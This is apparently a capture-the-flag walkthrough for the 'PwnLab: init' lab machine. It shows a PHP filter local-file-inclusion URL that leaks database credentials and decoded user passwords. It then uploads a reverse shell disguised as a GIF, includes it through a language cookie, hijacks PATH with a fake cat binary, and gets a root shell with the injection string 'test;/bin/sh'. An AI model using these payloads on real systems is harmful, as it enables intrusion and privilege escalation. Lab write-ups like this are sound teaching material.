PWNLAB: INIT Walkthrough

Wellcome to “PwnLab: init”, my first Boot2Root virtual machine. Meant to be easy, I hope you enjoy it and maybe learn something. The…

Wellcome to “PwnLab: init”, my first Boot2Root virtual machine. Meant to be easy, I hope you enjoy it and maybe learn something. The purpose of this CTF is to get root and read de flag.

PwnLab: init
This website uses 'cookies' to give you the best, most relevant experience. Using this website means you're happy with…

Enumeration

There is nothing to enumerate more on port 111, 3306 and 41649.

More Enumeration…

  1. HTTP 80
  • No manual finding — source code & robots.txt
  • Nothing critical on Nikto Server.
  • Gobuster output is given below.

Possible Intrusion is through,


Finding POI (Point Of Intrusion)

we have 3 php files

  1. upload.php — already accessible
  2. config.php
  3. login.php — already accessible

We need to try for LFI here and see the data in config.php. By the name, we could say that it is some data related to mysql.

http://192.168.103.151/?page=php://filter/convert.base64-encode/resource=login

<?php
$server = “localhost”;
$username = “root”;
$password = “H4u%QJ_H99”;
$database = “Users”;
?>

Got few users.

Let’s decode the pass:

kent:mike:kane
Sld6WHVCSkpOeQ==:U0lmZHNURW42SQ==:aVN2NVltMkdSbw==
JWzXuBJJNy:SIfdsTEn6I:iSv5Ym2GRo

Let’s try these credentials out:

Got access with kent:JWzXuBJJNy

Upload the reverse shell

You will be getting error since it accepts only images.

i was able to get the file uploaded but it is with image format. Hence, we need to find another way. After going through the application for sometime, found that we can use the index page for injection.

<?php
//Multilingual. Not implemented yet.
//setcookie(“lang”,”en.lang.php”);
if (isset($_COOKIE[‘lang’]))
{
include(“lang/”.$_COOKIE[‘lang’]);
}
// Not implemented yet.
?>
Setting the cookie to uploaded GIF

Remember to set magic byte on the file to get accepted. https://vk9-sec.com/local-file-upload-magic-byte-change-file-type/

Got the shell

Privilege Escaltion

  1. login to user -> kane:iSv5Ym2GRo

2. Run the msgmike and we will see that cat is getting execute. Hence, append /tmp to the PATH environment and add a cat file there.

3. we will get access to mike.

4. ./msg2root is the file in mike folder. It takes input from user, there is a possible command injection.

5. input test;/bin/sh -> you will get root


Photo by Sincerely Media on Unsplash